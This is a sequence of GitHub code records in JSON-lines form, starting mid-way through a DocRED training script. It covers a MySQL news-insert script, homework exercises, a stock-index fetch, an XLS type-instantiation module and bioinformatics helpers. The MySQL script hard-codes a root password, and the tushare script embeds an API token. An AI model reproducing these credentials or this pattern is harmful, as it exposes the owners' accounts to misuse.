0 else 0\r\n evi_r = 1.0 * correct_evidence / tot_evidences\r\n if evi_p + evi_r == 0:\r\n evi_f1 = 0\r\n else:\r\n evi_f1 = 2.0 * evi_p * evi_r / (evi_p + evi_r)\r\n\r\n re_p_ignore_train_annotated = 1.0 * (correct_re - correct_in_train_annotated) / (len(submission_answer) - correct_in_train_annotated + 1e-5)\r\n re_p_ignore_train = 1.0 * (correct_re - correct_in_train_distant) / (len(submission_answer) - correct_in_train_distant + 1e-5)\r\n\r\n if re_p_ignore_train_annotated + re_r == 0:\r\n re_f1_ignore_train_annotated = 0\r\n else:\r\n re_f1_ignore_train_annotated = 2.0 * re_p_ignore_train_annotated * re_r / (re_p_ignore_train_annotated + re_r)\r\n\r\n if re_p_ignore_train + re_r == 0:\r\n re_f1_ignore_train = 0\r\n else:\r\n re_f1_ignore_train = 2.0 * re_p_ignore_train * re_r / (re_p_ignore_train + re_r)\r\n\r\n return re_p, re_r, re_f1, evi_f1, re_f1_ignore_train_annotated, re_f1_ignore_train\r\n\r\ndef report(args, model, features, tag = \"test\"):\r\n\r\n dataloader = DataLoader(features, batch_size=args.test_batch_size, shuffle=False, collate_fn=collate_fn, drop_last=False)\r\n preds = []\r\n for batch in dataloader:\r\n model.eval()\r\n adjacency = convert_3dsparse_to_4dsparse(batch[5]).to(args.device)\r\n inputs = {'input_ids': batch[0].to(args.device),\r\n 'attention_mask': batch[1].to(args.device),\r\n 'entity_pos': batch[3],\r\n 'hts': batch[4],\r\n 'adjacency': adjacency,\r\n 'link_pos': batch[6],\r\n 'nodes_info': batch[7],\r\n }\r\n\r\n with torch.no_grad():\r\n pred, *_ = model(**inputs)\r\n pred = pred.cpu().numpy()\r\n pred[np.isnan(pred)] = 0\r\n preds.append(pred)\r\n\r\n preds = np.concatenate(preds, axis=0).astype(np.float32)\r\n\r\n # 计算结果\r\n # 首先通过preds和features得到预测的关系实例{'title': ;'h_idx': ;'t_idx': ;'r': }\r\n h_idx, t_idx, title = [], [], [] # 存放头尾实体,及文章标题\r\n\r\n for f in features:\r\n hts = f['hts']\r\n h_idx += [ht[0] for ht in hts] # 取头实体\r\n t_idx += [ht[1] for ht in hts]\r\n title += [f[\"title\"] for ht in hts]\r\n\r\n res = []\r\n for i in range(preds.shape[0]): # 取预测关系类型\r\n pred = preds[i]\r\n pred = np.nonzero(pred)[0].tolist()\r\n for p in pred:\r\n if p != 0:\r\n res.append(\r\n {\r\n 'title': title[i],\r\n 'h_idx': h_idx[i],\r\n 't_idx': t_idx[i],\r\n 'r': id2rel[p]\r\n }\r\n )\r\n return res\r\n\r\n\r\n\r\n\r\ndef humanized_time(second):\r\n \"\"\"\r\n :param second: time in seconds\r\n :return: human readable time (hours, minutes, seconds)\r\n \"\"\"\r\n m, s = divmod(second, 60)\r\n h, m = divmod(m, 60)\r\n return \"%dh %02dm %02ds\" % (h, m, s)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\"--data_dir\", default=\"./dataset/docred\", type=str)\r\n parser.add_argument(\"--transformer_type\", default=\"bert\", type=str)\r\n parser.add_argument(\"--model_name_or_path\", default=\"bert-base-cased\", type=str)\r\n parser.add_argument(\"--train_file\", default=\"train_annotated.json\", type=str)\r\n parser.add_argument(\"--dev_file\", default=\"dev.json\", type=str)\r\n parser.add_argument(\"--test_file\", default=\"test.json\", type=str)\r\n parser.add_argument(\"--save_path\", default=\"./saved_model/docred.model\", type=str)\r\n parser.add_argument(\"--load_path\", default=\"\", type=str)\r\n\r\n parser.add_argument(\"--config_name\", default=\"\", type=str,\r\n help=\"Pretrained config name or path if not the same as model_name\")\r\n parser.add_argument(\"--tokenizer_name\", default=\"\", type=str,\r\n help=\"Pretrained tokenizer name or path if not the same as model_name\")\r\n parser.add_argument(\"--max_seq_length\", default=1024, type=int,\r\n help=\"The maximum total input sequence length after tokenization. Sequences longer \"\r\n \"than this will be truncated, sequences shorter will be padded.\")\r\n parser.add_argument(\"--max_entity_number\", default=35, type=int,\r\n help=\"the max entity number in dataset.\")\r\n\r\n parser.add_argument(\"--train_batch_size\", default=4, type=int,\r\n help=\"Batch size for training.\")\r\n parser.add_argument(\"--test_batch_size\", default=8, type=int,\r\n help=\"Batch size for testing.\")\r\n parser.add_argument(\"--gradient_accumulation_steps\", default=1, type=int,\r\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\r\n parser.add_argument(\"--num_labels\", default=1, type=int,\r\n help=\"Max number of labels in the prediction.\")\r\n parser.add_argument(\"--learning_rate\", default=3e-5, type=float,\r\n help=\"The initial learning rate for Adam.\")\r\n parser.add_argument(\"--adam_epsilon\", default=1e-6, type=float,\r\n help=\"Epsilon for Adam optimizer.\")\r\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float,\r\n help=\"Max gradient norm.\")\r\n parser.add_argument(\"--warmup_ratio\", default=0.06, type=float,\r\n help=\"Warm up ratio for Adam.\")\r\n parser.add_argument(\"--num_train_epochs\", default=30, type=float,\r\n help=\"Total number of training epochs to perform.\")\r\n parser.add_argument(\"--evaluation_steps\", default=-1, type=int,\r\n help=\"Number of training steps between evaluations.\")\r\n parser.add_argument(\"--seed\", type=int, default=66,\r\n help=\"random seed for initialization.\")\r\n parser.add_argument(\"--num_class\", type=int, default=97,\r\n help=\"Number of relation types in dataset.\")\r\n\r\n args = parser.parse_args()\r\n # wandb.init(project=\"CDR\")\r\n\r\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\r\n args.n_gpu = torch.cuda.device_count()\r\n args.device = device\r\n\r\n config = AutoConfig.from_pretrained(\r\n args.config_name if args.config_name else args.model_name_or_path,\r\n num_labels = args.num_class\r\n )\r\n tokenizer = AutoTokenizer.from_pretrained(\r\n args.tokenizer_name if args.tokenizer_name else args.model_name_or_path,\r\n )\r\n\r\n read = read_docred\r\n\r\n train_file = os.path.join(args.data_dir, args.train_file)\r\n dev_file = os.path.join(args.data_dir, args.dev_file)\r\n test_file = os.path.join(args.data_dir, args.test_file)\r\n train_features = read(train_file, tokenizer, max_seq_length=args.max_seq_length)\r\n dev_features = read(dev_file, tokenizer, max_seq_length=args.max_seq_length)\r\n test_features = read(test_file, tokenizer, max_seq_length=args.max_seq_length)\r\n\r\n model = AutoModel.from_pretrained(\r\n args.model_name_or_path,\r\n from_tf=bool(\".ckpt\" in args.model_name_or_path),\r\n config=config,\r\n )\r\n\r\n config.cls_token_id = tokenizer.cls_token_id\r\n config.sep_token_id = tokenizer.sep_token_id\r\n config.transformer_type = args.transformer_type\r\n\r\n set_seed(args)\r\n # model = DocREModel(config, model, num_labels=args.num_labels)\r\n model = DocREModel(config, model, num_labels=args.num_labels, max_entity=args.max_entity_number)\r\n model.to(args.device)\r\n\r\n if args.load_path == \"\": #training\r\n train(args, model, train_features, dev_features)\r\n else: #testing\r\n # model = amp.initialize(model, opt_level=\"O1\", verbosity=0)\r\n model.load_state_dict(torch.load(args.load_path))\r\n dev_score, dev_output = evaluate(args, model, dev_features, tag=\"dev\")\r\n print(dev_output)\r\n pred = report(args, model, test_features, tag=\"test\")\r\n with open(\"result.json\", \"w\") as fh:\r\n json.dump(pred, fh)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"passengeryjy/ESGR","sub_path":"train_red.py","file_name":"train_red.py","file_ext":"py","file_size_in_byte":19255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22869220107","text":"import pymysql\n\nconn = None\ncur = None\n\ndata1=\"\"\ndata2=\"\"\ndata3=\"\"\ndata4=\"\"\n\nsql = \"\"\n\nconn = pymysql.connect(host='127.0.0.1', user='root', password='2021011545', db='news', charset='utf8')\ncur = conn.cursor()\n\nwhile(True):\n data1 = input(\"채널 ID: \")\n if data1 == \"\":\n break;\n data2 = input(\"비디오 ID: \")\n data3 = input(\"제목: \")\n data4 = input(\"내용: \")\n sql = \"INSERT INTO news (channel_id, video_id, title, summary) VALUES(%s, %s, %s, %s)\"\n values = (data1, data2, data3, data4)\n cur.execute(sql, values)\n\nconn.commit()\nconn.close()","repo_name":"HyeahnLee/database","sub_path":"myproject/golden.py","file_name":"golden.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"74732794188","text":"import math\n\nintLength = int(input(\"How many?\"))\n\nfrom datetime import datetime\ntstart = datetime.now()\n\nlstPrimes = list()\nintCurrent = 3\nlstPrimes.append(2)\n\nwhile(len(lstPrimes) < intLength):\n blPrime = True\n y = 2\n while(y < math.sqrt(intCurrent) + 1 and blPrime): \n if(intCurrent % y == 0):\n blPrime=False\n y += 1\n if(blPrime):\n #print(intCurrent)\n lstPrimes.append(intCurrent)\n intCurrent += 2\n\n#print(lstPrimes)\nprint('Answer:' + str(intCurrent - 2))\nprint('Time = ' + str(datetime.now() - tstart))\n","repo_name":"xnbya/pythonstuff","sub_path":"python/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"43594575364","text":"#Сформировать список из N членов последовательности.\n#Для N = 5: 1, -3, 9, -27, 81 и т.д.\n\ndef num (a):\n list=[]\n for i in range(0,a):\n list.append((-3)**i)\n print(list)\nnum (5) \n\n\n#Написать программу получающую набор произведений чисел от 1 до N.\n#Пример: пусть N = 4, тогда\n#[ 1, 2, 6, 24 ]\ndef num (a):\n num=1\n for i in range(1,a+1):\n num = num*i\n print(num)\nnum (4)\n\n\n#Подсчитать сумму цифр в вещественном числе.\n\nnum= input(\"Введите вещественное число: \")\nnum1 = num.split(\".\") \nintnum=int(num1[0])\ndigitnum=int(num1[1])\nsum=0\nwhile intnum>0:\n sum=sum+(intnum%10)\n intnum=intnum//10\nwhile digitnum>0:\n sum=sum+(digitnum%10)\n digitnum=digitnum//10\nprint(sum)","repo_name":"Dasha550/Homework_Python","sub_path":"CorrectionOnMistakesHomeWork1.py","file_name":"CorrectionOnMistakesHomeWork1.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8503791587","text":"from typing import Any, Text, Dict, Tuple, Optional\n\nfrom absl import logging\n\nfrom xls.dslx import parametric_expression\nfrom xls.dslx.concrete_type import ArrayType\nfrom xls.dslx.concrete_type import BitsType\nfrom xls.dslx.concrete_type import ConcreteType\nfrom xls.dslx.concrete_type import EnumType\nfrom xls.dslx.concrete_type import FunctionType\nfrom xls.dslx.concrete_type import TupleType\nfrom xls.dslx.span import Span\nfrom xls.dslx.xls_type_error import ArgCountMismatchError\nfrom xls.dslx.xls_type_error import XlsTypeError\n\nInvocation = Any # pylint: disable=invalid-name\nSymbolicBindings = Tuple[Tuple[Text, int], ...]\nParametricBinding = Any\nParametricBindings = Tuple[ParametricBinding, ...]\nDeduceCtx = Any\nExpr = Any\n\n\nclass _ParametricInstantiator(object):\n \"\"\"Helper class for instantiating a parametric invocation.\n\n Attributes:\n span: Span for the instantiation; e.g. of the invocation AST node being\n instantiated.\n function_type: (Parametric) function type being instantiated.\n arg_types: Argument types presented to the parametric function type.\n symbolic_bindings: Mapping from name to bound value as encountered in the\n instantiation process; e.g. instantiating `fn [N: u32] id(bits[N]) ->\n bits[N]` with a u32 would lead to `{'N': 32}` as the symbolic bindings.\n constraints: Mapping from parametric to its expression.\n e.g. For [X: u32, Y: u32 = X + X], we'd have X -> (32, None) and\n Y -> (32, (X + X)).\n bit_widths: Mapping from parametric to its bit count\n e.g. From above, X -> 32 and Y -> 32\n\n ctx: Wrapper over useful typechecking objects (see deduce.DeduceCtx).\n \"\"\"\n\n def __init__(self, span: Span, function_type: ConcreteType,\n arg_types: Tuple[ConcreteType, ...], ctx: DeduceCtx,\n parametric_constraints: Optional[ParametricBindings]):\n self.span = span\n self.function_type = function_type\n self.arg_types = arg_types\n self.ctx = ctx\n self.symbolic_bindings = {} # type: Dict[Text, int]\n self.constraints = {} # type: Dict[Text, Optional[Expr]]\n self.bit_widths = {} # type: Dict[Text, int]\n\n param_types = self.function_type.get_function_params()\n if len(self.arg_types) != len(param_types):\n raise ArgCountMismatchError(self.span, arg_types, len(param_types),\n param_types,\n 'Invocation of parametric function.')\n if parametric_constraints:\n for b in parametric_constraints:\n bit_count = b.type_.primitive_to_bits()\n self.bit_widths[b.name.identifier] = bit_count\n self.constraints[b.name.identifier] = b.expr\n\n def _verify_constraints(self) -> None:\n \"\"\"Verifies that all parametrics adhere to signature constraints.\n\n Take the following function signature for example:\n fn [X: u32, Y: u32 = X + X] f(x: bits[X], y: bits[Y]) -> bits[Y]\n\n The parametric Y has two constraints based only off the signature:\n it must match the bitwidth of the argument y and it must be equal to\n X + X. This function is responsible for computing any derived parametrics\n and asserting that their values are consistent with other constraints\n (arg types).\n \"\"\"\n for binding, constraint in self.constraints.items():\n if constraint is None:\n # e.g. [X: u32]\n continue\n try:\n fn_name, fn_symbolic_bindings = self.ctx.fn_stack[-1]\n fn_ctx = (self.ctx.module.name, fn_name,\n tuple(fn_symbolic_bindings.items()))\n result = self.ctx.interpret_expr(\n self.ctx.module,\n self.ctx.node_to_type,\n self.symbolic_bindings,\n self.bit_widths,\n constraint,\n fn_ctx=fn_ctx)\n except KeyError as e:\n # We haven't seen enough bindings to evaluate this constraint.\n continue\n\n if binding in self.symbolic_bindings.keys():\n if result != self.symbolic_bindings[binding]:\n raise XlsTypeError(\n self.span,\n BitsType(signed=False, size=self.symbolic_bindings[binding]),\n BitsType(signed=False, size=result),\n suffix=f'Parametric constraint violated, saw {binding} = {constraint} = {result}; '\n f'then {binding} = {self.symbolic_bindings[binding]}')\n else:\n self.symbolic_bindings[binding] = result\n\n def _symbolic_bind_dims(self, param_type: ConcreteType,\n arg_type: ConcreteType) -> None:\n \"\"\"Binds parametric symbols in param_type according to arg_type.\"\"\"\n # Create bindings for symbolic parameter dimensions based on argument\n # values passed.\n param_dim = param_type.size\n arg_dim = arg_type.size\n if not isinstance(param_dim, parametric_expression.ParametricSymbol):\n return\n\n pdim_name = param_dim.identifier\n if (pdim_name in self.symbolic_bindings and\n self.symbolic_bindings[pdim_name] != arg_dim):\n if self.constraints[pdim_name]:\n # Error on violated constraint.\n raise XlsTypeError(\n self.span,\n BitsType(signed=False, size=self.symbolic_bindings[pdim_name]),\n arg_type,\n suffix=f'Parametric constraint violated, saw {pdim_name} '\n f'= {self.constraints[pdim_name]} '\n f'= {self.symbolic_bindings[pdim_name]}; '\n f'then {pdim_name} = {arg_dim}')\n else:\n # Error on conflicting argument types.\n raise XlsTypeError(\n self.span,\n param_type,\n arg_type,\n suffix='Parametric value {} was bound to different values at '\n 'different places in invocation; saw: {!r}; then: {!r}'.format(\n pdim_name, self.symbolic_bindings[pdim_name], arg_dim))\n\n logging.vlog(2, 'Binding %r to %s', pdim_name, arg_dim)\n self.symbolic_bindings[pdim_name] = arg_dim\n\n def _symbolic_bind_bits(self, param_type: ConcreteType,\n arg_type: ConcreteType) -> None:\n \"\"\"Binds any parametric symbols in the \"bits\" param_type.\"\"\"\n assert isinstance(param_type, ConcreteType), repr(param_type)\n assert isinstance(arg_type, ConcreteType), repr(arg_type)\n assert (type(param_type) == type(arg_type) # pylint: disable=unidiomatic-typecheck\n and isinstance(param_type, (BitsType, EnumType)))\n\n if isinstance(param_type, EnumType):\n return # Enums have no size.\n\n self._symbolic_bind_dims(param_type, arg_type)\n\n def _symbolic_bind_tuple(self, param_type: ConcreteType,\n arg_type: ConcreteType):\n \"\"\"Binds any parametric symbols in the \"tuple\" param_type.\"\"\"\n assert isinstance(param_type, TupleType) and isinstance(arg_type, TupleType)\n for param_member, arg_member in zip(param_type.get_unnamed_members(),\n arg_type.get_unnamed_members()):\n self._symbolic_bind(param_member, arg_member)\n\n def _symbolic_bind_array(self, param_type: ConcreteType,\n arg_type: ConcreteType):\n \"\"\"Binds any parametric symbols in the \"array\" param_type.\"\"\"\n assert isinstance(param_type, ArrayType) and isinstance(arg_type, ArrayType)\n self._symbolic_bind(param_type.get_element_type(),\n arg_type.get_element_type())\n self._symbolic_bind_dims(param_type, arg_type)\n\n def _symbolic_bind_function(self, param_type: ConcreteType,\n arg_type: ConcreteType):\n \"\"\"Binds any parametric symbols in the \"function\" param_type.\"\"\"\n assert isinstance(param_type, FunctionType) and isinstance(\n arg_type, FunctionType)\n for param_param, arg_param in zip(param_type.get_function_params(),\n arg_type.get_function_params()):\n self._symbolic_bind(param_param, arg_param)\n self._symbolic_bind(param_type.get_function_return_type(),\n arg_type.get_function_return_type())\n\n def _symbolic_bind(self, param_type: ConcreteType,\n arg_type: ConcreteType) -> None:\n \"\"\"Binds symbols present in param_type according to value of arg_type.\"\"\"\n assert isinstance(param_type, ConcreteType), repr(param_type)\n assert isinstance(arg_type, ConcreteType), repr(arg_type)\n if isinstance(param_type, BitsType):\n self._symbolic_bind_bits(param_type, arg_type)\n elif isinstance(param_type, EnumType):\n assert param_type.nominal_type == arg_type.nominal_type\n # If the enums are the same, we do the same thing as we do with bits\n # (ignore the primitive and symbolic bind the dims).\n self._symbolic_bind_bits(param_type, arg_type)\n elif isinstance(param_type, TupleType):\n if param_type.nominal_type != arg_type.nominal_type:\n raise XlsTypeError(\n self.span,\n param_type,\n arg_type,\n suffix='parameter type name: {}; argument type name: {}.'.format(\n repr(param_type.nominal_type.identifier)\n if param_type.nominal_type else '',\n repr(arg_type.nominal_type.identifier)\n if arg_type.nominal_type else ''))\n self._symbolic_bind_tuple(param_type, arg_type)\n elif isinstance(param_type, ArrayType):\n self._symbolic_bind_array(param_type, arg_type)\n elif isinstance(param_type, FunctionType):\n self._symbolic_bind_function(param_type, arg_type)\n else:\n raise NotImplementedError('Bind symbols in parameter type {} @ {}'.format(\n param_type, self.span))\n\n def _instantiate_one_arg(self, i: int, param_type: ConcreteType,\n arg_type: ConcreteType) -> ConcreteType:\n \"\"\"Binds param_type via arg_type, updating symbolic bindings.\"\"\"\n assert isinstance(param_type, ConcreteType), repr(param_type)\n assert isinstance(arg_type, ConcreteType), repr(arg_type)\n # Check parameter and arg types are the same kind.\n if type(param_type) != type(arg_type): # pylint: disable=unidiomatic-typecheck\n raise XlsTypeError(\n self.span,\n param_type,\n arg_type,\n suffix='Parameter {} and argument types are different kinds ({} vs {})'\n ' in invocation which has type `{}`.'.format(\n i, param_type.get_debug_type_name(),\n arg_type.get_debug_type_name(), self.function_type))\n\n logging.vlog(3, 'Symbolically binding param_type %d %s against arg_type %s',\n i, param_type, arg_type)\n self._symbolic_bind(param_type, arg_type)\n resolved = self._resolve(param_type)\n logging.vlog(3, 'Resolved param_type: %s', resolved)\n return resolved\n\n def _resolve(self, annotated: ConcreteType) -> ConcreteType:\n \"\"\"Resolves a parametric type via symbolic_bindings.\"\"\"\n\n if self.constraints:\n self._verify_constraints()\n\n def resolver(dim):\n if isinstance(dim, parametric_expression.ParametricExpression):\n return dim.evaluate(self.symbolic_bindings)\n return dim\n\n return annotated.map_size(resolver)\n\n def instantiate(self) -> Tuple[ConcreteType, SymbolicBindings]:\n \"\"\"Updates symbolic bindings for the parameter types according to arg_types.\n\n Instantiates the parameters of function_type according to the presented\n arg_types; e.g. when a bits[3,4] argument is passed to a bits[N,M]\n parameter, we note that N=3 and M=4 for resolution in the return type.\n\n Returns:\n The return type of the function_type, with parametric types instantiated\n in accordance with the presented argument types.\n \"\"\"\n # Walk through all the params/args to collect symbolic bindings.\n for i, (param_type, arg_type) in enumerate(\n zip(self.function_type.get_function_params(), self.arg_types)):\n param_type = self._instantiate_one_arg(i, param_type, arg_type)\n logging.vlog(\n 3, 'Post-instantiation; paramno: %d; param_type: %s; arg_type: %s', i,\n param_type, arg_type)\n if param_type != arg_type:\n message = 'Mismatch between parameter and argument types.'\n if str(param_type) == str(arg_type):\n message += ' {!r} vs {!r}'.format(param_type, arg_type)\n raise XlsTypeError(self.span, param_type, arg_type, suffix=message)\n\n # Resolve the return type according to the bindings we collected.\n orig = self.function_type.get_function_return_type()\n resolved = self._resolve(orig)\n logging.vlog(2, 'Resolved return type from %s to %s', orig, resolved)\n return resolved, tuple(sorted(self.symbolic_bindings.items()))\n\n\ndef instantiate(\n span: Span, callee_type: ConcreteType,\n arg_types: Tuple[ConcreteType, ...],\n ctx: DeduceCtx,\n parametric_bindings: Optional[ParametricBindings]) \\\n -> Tuple[ConcreteType, SymbolicBindings]:\n return _ParametricInstantiator(span, callee_type, arg_types, ctx,\n parametric_bindings).instantiate()\n","repo_name":"julianviera99/xls","sub_path":"xls/dslx/parametric_instantiator.py","file_name":"parametric_instantiator.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35980826267","text":"# 새롭게 알게된 내장함수 bin(대상) : bin안에 있는 10진수 숫자를 2로 바꿔준다.\n# n진수 → 10진수 : int(string, base)\n# 10진수 → 2, 8, 16진수 : bin(), oct(), hex() \n# 위 방법은 앞에 0b가 붙기 때문에 [2:] 처리를 해줘야함\n\ndef solution(n, arr1, arr2): # arr1, arr2에 있는 10진수들을 2진수로 bin()을 사용하여 변환하여 각 번호의 리스트에 저장\n lst1 = [] \n for i in arr1:\n a = bin(i) \n a = a[2:] # 0b가 붙기 때문에 잘라서 변환\n if len(a) < n: # n보다 작으면 안맞기 때문에 자리수를 맞추기 위해 zfill로 n만큼 0을 추가(길이가 n보다 작을 경우)\n a = a.zfill(n)\n lst1.append(a)\n else:\n lst1.append(a)\n \n lst2 = [] # 위 방식과 같음\n for j in arr2:\n b = bin(j)\n b = b[2:]\n if len(b) < n:\n b = b.zfill(n)\n lst2.append(b)\n else:\n lst2.append(b)\n answer = ['' for _ in range(n)] # 빈 문자열 5개를 만들어 결과 배열 생성\n \n for k in range(n): # lst1 과 lst2를 둘다 돌면서 둘중 하나라도 1이면 정답 배열에 #추가하고 아니면 공백 추가해서 비밀지도 완성\n for l in range(n):\n if lst1[k][l] == \"1\" or lst2[k][l] == \"1\":\n answer[k] += \"#\"\n else:\n answer[k] += \" \"\n return answer\n \n \n \n \n \n ","repo_name":"BellOne4222/Coding_Test_Repo","sub_path":"프로그래머스/lv1/17681. [1차] 비밀지도/[1차] 비밀지도.py","file_name":"[1차] 비밀지도.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"30283914507","text":"# 导入tushare\nimport tushare as ts\n\n# 初始化pro接口\npro = ts.pro_api('ca0af3044cc38461f8e4ae128c9edabc12bcab9f4628f5cf6b6d863a')\n\n# 拉取数据\ndf = pro.index_global(**{\n \"ts_code\": \"\",\n \"trade_date\": \"\",\n \"start_date\": \"\",\n \"end_date\": \"\",\n \"limit\": \"\",\n \"offset\": \"\"\n}, fields=[\n \"ts_code\",\n \"trade_date\",\n \"open\",\n \"close\",\n \"high\",\n \"low\",\n \"pre_close\",\n \"change\",\n \"pct_chg\",\n \"swing\",\n \"vol\"\n])\nprint(df)\n\n","repo_name":"fionlei/tushare_data","sub_path":"05-指数/14-国际主要指数.py","file_name":"14-国际主要指数.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71609606669","text":"import re\nimport subprocess\nimport gzip\nimport os\nimport sys\nimport uuid\nimport shutil\nimport requests\nfrom requests import HTTPError\nfrom tenacity import retry, retry_if_exception_type, stop_after_attempt, wait_fixed\n\n#Todo: download by async: https://hackernoon.com/how-to-speed-up-file-downloads-with-python\ndef get_response(retry_state):\n print(f\" Maximum number of retries exceeded. {retry_state} \")\n@retry(\n retry=(\n retry_if_exception_type(HTTPError) \n ),\n stop=stop_after_attempt(5),\n wait=wait_fixed(30),\n retry_error_callback=get_response\n)\ndef download_file(url, path, gunzip=False):\n # If the URL has already been downloaded, we can skip downloading it again.\n if os.path.exists(path):\n return path\n\n if os.path.dirname(path):\n os.makedirs(os.path.dirname(path), exist_ok=True)\n\n try:\n with requests.get(url, stream=True) as resp:\n resp.raise_for_status()\n\n # We download to a path in the same directory so we can do an\n # atomic ``os.rename()`` later -- atomic renames don't work\n # across filesystem boundaries.\n tmp_path = f\"{path}.{uuid.uuid4()}.tmp\"\n\n with open(tmp_path, \"wb\") as out_file:\n for chunk in resp.iter_content(chunk_size=1000000):\n out_file.write(chunk)\n\n # If something goes wrong, it will probably be retried by tenacity.\n # Log the exception in case a programming bug has been introduced in\n # the ``try`` block or there's a persistent error.\n except Exception as exc:\n print(exc, file=sys.stderr)\n raise\n \n if gunzip==True and get_compress_type(tmp_path)=='gzip':\n with gzip.open(tmp_path, 'rb') as f_in:\n with open(path, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n else:\n os.rename(tmp_path, path)\n return path\n\ndef get_compress_type(filepath):\n with open(filepath, 'rb') as f:\n first_two_bytes = f.read(2)\n if first_two_bytes == b'\\x1f\\x8b':\n return 'gzip'\n # TODO: fill in for bzip\n\n # Dont know type\n return None\n\n\ndef get_open_func(filepath):\n \"\"\"\n Determine compression type (by looking the first 2 bytes) and return the\n right open function to open the file\n Parameters\n ----------\n filepath\n\n Returns\n -------\n\n \"\"\"\n compress_type = get_compress_type(filepath)\n if compress_type == 'gzip':\n return gzip.open\n return open\n\n\ndef valid_id(sid):\n \"\"\"\n Check if string can be a valid id, that is, it can only the following characters:\n - alphanumerical\n - Underscores\n - Dot\n Parameters\n ----------\n sid\n\n Returns\n -------\n\n \"\"\"\n return re.match(r'^[.\\w]+$', sid)\n\n\ndef translate_dna(sequence):\n \"\"\"\n :param sequence: (str) a DNA sequence string\n :return: (str) a protein string from the forward reading frame 1\n \"\"\"\n\n codontable = {'ATA': 'I', 'ATC': 'I', 'ATT': 'I', 'ATG': 'M',\n 'ACA': 'T', 'ACC': 'T', 'ACG': 'T', 'ACT': 'T',\n 'AAC': 'N', 'AAT': 'N', 'AAA': 'K', 'AAG': 'K',\n 'AGC': 'S', 'AGT': 'S', 'AGA': 'R', 'AGG': 'R',\n 'CTA': 'L', 'CTC': 'L', 'CTG': 'L', 'CTT': 'L',\n 'CCA': 'P', 'CCC': 'P', 'CCG': 'P', 'CCT': 'P',\n 'CAC': 'H', 'CAT': 'H', 'CAA': 'Q', 'CAG': 'Q',\n 'CGA': 'R', 'CGC': 'R', 'CGG': 'R', 'CGT': 'R',\n 'GTA': 'V', 'GTC': 'V', 'GTG': 'V', 'GTT': 'V',\n 'GCA': 'A', 'GCC': 'A', 'GCG': 'A', 'GCT': 'A',\n 'GAC': 'D', 'GAT': 'D', 'GAA': 'E', 'GAG': 'E',\n 'GGA': 'G', 'GGC': 'G', 'GGG': 'G', 'GGT': 'G',\n 'TCA': 'S', 'TCC': 'S', 'TCG': 'S', 'TCT': 'S',\n 'TTC': 'F', 'TTT': 'F', 'TTA': 'L', 'TTG': 'L',\n 'TAC': 'Y', 'TAT': 'Y', 'TAA': '*', 'TAG': '*',\n 'TGC': 'C', 'TGT': 'C', 'TGA': '*', 'TGG': 'W',\n }\n seq = sequence.upper()\n prot = []\n\n for n in range(0, len(seq), 3):\n if seq[n:n + 3] in codontable:\n residue = codontable[seq[n:n + 3]]\n else:\n residue = \"-\"\n\n prot.append(residue)\n\n return \"\".join(prot)\n\n\ndef software_version(software_list=None):\n # List of known software and their version\n cmd_versions = {\n # Basic\n 'java': 'java -version 2>&1 | head -n 1',\n 'python': 'python --version 2>&1',\n\n # workflow language\n 'cromwell': 'cromwell.sh --version 2>&1',\n\n # Fundamental tools\n 'samtools': 'samtools --version 2>&1| head -n 2 | tr \"\\n\" \" \"',\n 'blast': 'blastn -version 2>&1 | head -n 1',\n\n # Assemblers\n 'spades': 'spades.py -v 2>&1',\n 'skesa': 'skesa --version 2>&1 | tail -1',\n 'shovill': 'shovill --version 2>&1',\n #QC\n 'fastqc':'fastqc -v',\n 'multiqc':'multiqc --version',\n 'quast':'quast -v',\n #taxonomy\n 'kraken2':'kraken2 -v | head -n 1',\n # Annotations\n 'prokka': 'prokka -version 2>&1',\n 'mlst': 'mlst --version 2>&1',\n 'abricate': 'abricate --version 2>&1|tr \"\\n\" \" \" && abricate --list|awk \\'BEGIN{printf(\"| Database: \");}NR>1{printf(\"%s \",$1)}\\'',\n 'snippy': 'snippy --version 2>&1',\n 'amrfinder':'amrfinder --version',\n # Pangenome tools\n 'roary': 'roary --version 2>&1 | tail -n 1',\n 'parsnp': 'parsnp --version 2>&1 | tail -1',\n 'iqtree':'iqtree --version | head -n 1',\n # misc\n 'trimmomatic': 'trimmomatic -version 2>&1',\n 'isescan':'isescan.py --version',\n\n # Others:\n 'nodejs':'node --version 2>&1 | tail -1'\n }\n if software_list is None:\n software_list = cmd_versions.keys()\n\n for sw in software_list:\n if sw in cmd_versions:\n cmd = cmd_versions[sw]\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n ret = p.wait()\n if ret == 0:\n print('{:12}= {}'.format(sw, output.decode().strip()))\n else:\n print('{:12}= {}'.format(sw, 'NOT FOUND'))\n\n for sw in software_list:\n if sw not in cmd_versions:\n print('Cannot check software version for {}'.format(sw))\ndef copy_file(source_file, dest_dir):\n #try:\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n dest_file = os.path.join(dest_dir, os.path.basename(source_file))\n shutil.copyfile(source_file, dest_file)\n return 